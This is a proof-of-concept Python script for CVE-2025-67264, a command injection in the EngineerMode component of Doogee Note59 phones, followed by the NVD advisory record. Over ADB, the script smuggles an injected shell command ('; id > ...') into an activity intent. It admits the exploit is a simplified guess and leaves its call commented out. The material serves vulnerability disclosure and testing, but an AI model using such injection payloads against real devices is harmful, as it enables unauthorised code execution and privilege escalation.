CVE-2025-67264

# CVE-2025-67264 PoC - OS Command Injection in com.sprd.engineermode # Affected: Doogee Note59, Note59 Pro, Note59 Pro+ # This PoC demonstrates the command injection vulnerability via ADB shell import subprocess import sys def check_vulnerability(): """Check if the device is vulnerable to CVE-2025-67264""" print("[*] CVE-2025-67264 Vulnerability Check") print("[*] Target: Doogee Note59 Series") print("[*] Component: com.sprd.engineermode") try: # Check if EngineerMode component exists result = subprocess.run( ['adb', 'shell', 'pm', 'list', 'packages', 'com.sprd.engineermode'], capture_output=True, text=True, timeout=10 ) if 'com.sprd.engineermode' in result.stdout: print("[+] EngineerMode component found - device may be vulnerable") return True else: print("[-] EngineerMode component not found") return False except Exception as e: print(f"[-] Error: {e}") return False def exploit_command_injection(): """Attempt to inject OS command via vulnerable component""" print("[*] Attempting command injection...") # This is a simplified PoC - actual exploitation requires # specific knowledge of the vulnerable function parameters malicious_cmd = "; id > /data/local/tmp/cve_poc_result;" # Example command that might trigger the vulnerability # Note: Actual exploitation requires reverse engineering of the app exploit_cmd = f'am start -n com.sprd.engineermode/.EngineerModeActivity --es "param" "{malicious_cmd}"' try: subprocess.run(['adb', 'shell', exploit_cmd], timeout=10) print("[*] Exploit command sent") print("[*] Check /data/local/tmp/cve_poc_result for output") except Exception as e: print(f"[-] Exploit failed: {e}") if __name__ == "__main__": if check_vulnerability(): print("[!] Device appears to be running vulnerable firmware") print("[!] This PoC is for authorized testing only") # Uncomment to run exploit: # exploit_command_injection() else: print("[+] Device may not be vulnerable or is not a target device")

{"cve": {"id": "CVE-2025-67264", "sourceIdentifier": "[email protected]", "published": "2026-01-23T20:15:53.790", "lastModified": "2026-02-11T19:26:36.910", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An OS command injection vulnerability in the com.sprd.engineermode component in Doogee Note59, Note59 Pro, and Note59 Pro+ allows a local attacker to execute arbitrary code and escalate privileges via the EngineerMode ADB shell, due to incomplete patching of CVE-2025-31710"}, {"lang": "es", "value": "Una vulnerabilidad de inyección de comandos del sistema operativo en el componente com.sprd.engineermode en Doogee Note59, Note59 Pro y Note59 Pro+ permite a un atacante local ejecutar código arbitrario y escalar privilegios a través de la shell ADB de EngineerMode, debido a un parcheo incompleto de CVE-2025-31710."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:doogee:note59_pro\\+_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "57EC2345-0607-45FD-A622-44BEB6A5876E"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:doogee:note59_pro\\+:-:*:*:*:*:*:*:*", "matchCriteriaId": "173F2257-918F-4A18-815D-22F412D52970"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:doogee:note59_pro_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "4F1D8C81-DA6F-4A40-9A72-2FA576548460"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:doogee:note59_pro:-:*:*:*:*:*:*:*", "matchCriteriaId": "6F632AA1-A033-4187-83A5-FC686C77EB6E"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:doogee:note59_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "ECECA979-0A48-4F1B-A020-F148C375812E"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:doogee:note59:-:*:*:*:*:*:*:*", "matchCriteriaId": "9BEC86EC-56B8-4754-A128-8E885827BFB8"}]}]}], "references": [{"url": "http://doogee.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/Skorpion96/unisoc-su/blob/main/CVE-2025-67264.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}